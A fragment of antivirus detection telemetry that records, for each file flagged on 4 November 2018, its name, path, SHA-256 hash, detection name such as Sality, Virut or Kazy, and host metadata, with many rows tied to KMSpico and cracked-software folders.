  Row(detection=Row(filename='avscan-20181105-055551-48d4d377', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055551-48D4D377', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:55:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ohljdgkm.exe', filepath='E:\\Files\\_\\\xa0\\RECYCLER\\S-7-2-78-8025257506-8562600567-810682140-8285\\OHljdGKm.exe', filesize=64000, name='TR/Rogue.64000.#M1.#R1'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T00:32:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104818-c75d8c2d', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-104759-C352569D\\AVSCAN-20181104-104818-C75D8C2D', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:47:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055349-3d054274', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055349-3D054274', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:53:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055330-3b30f437', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055330-3B30F437', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:53:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055712-50b52540', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055712-50B52540', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:57:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055419-3fe91ae3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055419-3FE91AE3', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:54:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055402-3e5005f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055402-3E5005F0', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:54:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055658-4f5912ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055658-4F5912EF', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:57:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055517-4592f7ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055517-4592F7EF', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:55:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055646-4e1c39ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055646-4E1C39EE', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:56:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='aspex_helpersrv.exe', filepath='E:\\PORTABLE Software\\Silhouette America\\Silhouette Studio\\Resources\\Resources\\SPEC_ANY\\AH\\aspex_helperSrv.exe', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:21:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='silhouette studiosrv.exe', filepath='E:\\PORTABLE Software\\Silhouette America\\Silhouette Studio\\Silhouette StudioSrv.exe', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:21:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='silhouette studiosrv.exe', filepath='E:\\PORTABLE Software\\Silhouette America\\Silhouette Studio\\Silhouette StudioSrv.exe', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:21:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-195417-a634618d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-195345-A1657267\\AVSCAN-20181101-195417-A634618D', filesize=64000, name='TR/Rogue.64000.#M1.#R1'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:33:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-195410-a528bb03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-195345-A1657267\\AVSCAN-20181101-195410-A528BB03', filesize=64000, name='TR/Rogue.64000.#M1.#R1'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:33:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bin2elf.exe', filepath='C:\\Flashtool\\x10flasher_lib\\bin2elf.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='1cc0898f5cb28f881016a39aa54fed4a5aacbc0e7de849d186f3efa30209d73d', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T16:13:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\PROGRAM FILES (X86)\\INSTALLSHIELD INSTALLATION INFORMATION\\{0D7CD0D9-4A88-4A63-8F91-3F4E8F371768}\\setup.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='1d6c4348ae0900e569860c24239ab64d3033f05516b277c784479a9054e96e80', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\EgisTec MyWinLocker\\x86\\mwlDaemon.exe', parentsize=349552, timestamp='2018-11-04T18:20:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160343-f0671519', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9dca68d4\\AVSCAN-20181104-160244-E8EDE9E8\\AVSCAN-20181104-160343-F0671519', filesize=384000, name='TR/Black.Gen2.#M1.#R1'), hash='1d9bba05408fdc74c1839a8890ab5092359bda910db9219287afe6a77cabe8e5', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:03:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160212-e4c21291', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9dca68d4\\AVSCAN-20181104-160117-DDD53B36\\AVSCAN-20181104-160212-E4C21291', filesize=384000, name='TR/Black.Gen2.#M1.#R1'), hash='1d9bba05408fdc74c1839a8890ab5092359bda910db9219287afe6a77cabe8e5', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:02:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='exetools.sys', filepath='C:\\Users\\X\\Desktop\\12.2.50\\12.3.167.0\\Cracked\\Emulator\\Emul_64\\Exetools.sys', filesize=384000, name='TR/Black.Gen2.#M300.#R100338'), hash='1d9bba05408fdc74c1839a8890ab5092359bda910db9219287afe6a77cabe8e5', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:djKZFSLfZUi+vTm2.1', country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T14:54:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cc762bcc20d38fae9dd8160bcc2a77b8f24b64c0', filepath='C:\\Users\\X\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\S6dzS5rG.default\\cache2\\entries\\CC762BCC20D38FAE9DD8160BCC2A77B8F24B64C0', filesize=528000, name='ADWARE/Amonetize.Gen7.#M300.#R602199'), hash='1df889da173c2e7b82795aef6ca6f5bfac27746dee21ccc2b095e11b4f2cd471', metadata=Row(cmdline='-osint -url \\\\\\"https:\\\\\\/\\\\\\/www.java.com\\\\\\/en\\\\\\/download\\\\\\/\\\\\\"', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=510928, timestamp='2018-11-04T13:36:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-120703-1c3a04c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ad6bb1d\\AVSCAN-20181104-120556-157A3FEF\\AVSCAN-20181104-120703-1C3A04C2', filesize=64000, name='Adware/Agent.cpdes.#M1.#R1'), hash='1e1dbfbbd2200ab8bd10445b01ef228d054a09dbf8b6036d921420e625055c22', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:07:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maskitservice.exe', filepath='C:\\Program Files (x86)\\Maskit\\MaskitService.exe', filesize=64000, name='Adware/Agent.cpdes.#M1.#R1'), hash='1e1dbfbbd2200ab8bd10445b01ef228d054a09dbf8b6036d921420e625055c22', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\services.exe', parentsize=None, timestamp='2018-11-04T09:04:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='grotty.exe', filepath='C:\\altera\\91sp2\\quartus\\bin\\cygwin\\bin\\grotty.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='1e270e47555965a89f16c71287f37b1bdc3fb17a2c188069aad8ae5271d04a87', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T05:06:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='svchost.exe', filepath='C:\\Documents and Settings\\X\\Dane aplikacji\\29899417\\svchost.exe', filesize=320000, name='HEUR/AGEN.1004092.#M1.#R1'), hash='1e2ac26940534dcd587aef71a1b70ff53cfc8714cd59431ee5687493869d916d', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:32:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='steamclient.dll', filepath='D:\\Half-Life 2\\bin\\steamclient.dll', filesize=512000, name='SPR/GameHack.#M1.#R1'), hash='1e736ee3d89ca094d5e435268a5fcf32cb633d8366cf1ff9d84564e152ab3401', metadata=Row(cmdline='-steam -game hl2 -appid 220 ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Half-Life 2\\hl2.exe', parentsize=103760, timestamp='2018-11-04T07:02:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='7wonders2.exe', filepath='D:\\العاب حديثة\\7 Wonders II\\7Wonders2.exe', filesize=2048000, name='W32/Virut.Gen.#M1.#R1'), hash='1ebb8e421c3ed5bbedf4d6ef83e41ef26a05a43e50fb42b925cee9b1791429aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:09:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003378.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003378.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='1ecffd8bca3266e27ceae6636f113c5af8590e613a536e2a6943ce1fbf5f286f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:28:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-164825-462407c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-163503-DFA342B5\\AVSCAN-20181104-164825-462407C1', filesize=1408000, name='HEUR/AGEN.1003956.#M1.#R1'), hash='1ee107a19d62f9ff979ba3fbb5a39635edad82c34b6ec78b4dc01c08e9083404', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T09:48:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-010752-438e9269', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_abacec2e\\AVSCAN-20181105-010551-2D0A8DFE\\AVSCAN-20181105-010752-438E9269', filesize=24840000, name='TR/Taranis.1662.#M1.#R1'), hash='1eec522942503eb911c7495b4a63203df7cc7441c6a19dba270f5485619a81a6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:07:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001400-50a6869c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b450994d\\AVSCAN-20181105-001328-4CD55D2F\\AVSCAN-20181105-001400-50A6869C', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:13:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:39:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-004942-f71bd22c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0874acbe\\AVSCAN-20181105-004848-F02704B4\\AVSCAN-20181105-004942-F71BD22C', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:49:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T06:41:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T22:14:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:50:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:36:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.vir', filepath='C:\\Program Files\\KMSpico\\Service_KMS.VIR', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='--engine=2 --session-id=WzsJimFyRuiBDuuZeegJN5nPkZnpUX81m2YPgA+t --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-04T21:11:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.vir', filepath='C:\\Program Files\\KMSpico\\Service_KMS.VIR', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='--engine=2 --session-id=WzsJimFyRuiBDuuZeegJN5nPkZnpUX81m2YPgA+t --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-04T21:11:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.vir', filepath='C:\\Program Files\\KMSpico\\Service_KMS.VIR', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='--engine=2 --session-id=WzsJimFyRuiBDuuZeegJN5nPkZnpUX81m2YPgA+t --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-04T21:12:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001250-47fc1421', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b450994d\\AVSCAN-20181105-001203-4201F4A6\\AVSCAN-20181105-001250-47FC1421', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:12:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:45:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T21:27:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T21:48:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='\\\\?\\C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:37:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T07:05:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T07:04:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.vir', filepath='C:\\Program Files\\KMSpico\\Service_KMS.VIR', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='--engine=2 --session-id=WzsJimFyRuiBDuuZeegJN5nPkZnpUX81m2YPgA+t --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-04T21:13:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noi dung kiem tra.exe', filepath='C:\\Users\\X\\Desktop\\khảo sát mô hình tự phòng, tự quản về ANTT\\khảo sát mô hình tự phòng, tự quản về ANTT\\noi dung kiem tra.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='1fa394368878d4cc970b53acb05a257f3cf8d003ccdcfa7fe1d4fdf30e8c83f7', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T01:42:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='banditry.dll', filepath='\\\\?\\C:\\Program Files (x86)\\leiber\\banditry.dll', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='1fd9fc5ca54978fa144f9cf5e013d171733ab5788bf02930260c68a8e49bdf05', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:20:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203106-6f9a6bd9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8abaa0b2\\AVSCAN-20181104-185408-ED74E5F5\\AVSCAN-20181104-203106-6F9A6BD9', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2026dae4954364a3478ca8f77b77ee370789bb13109b3d69eae0a61444eaea68', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:26:34Z'), dt=datetime.date(2018, 11, 4)),
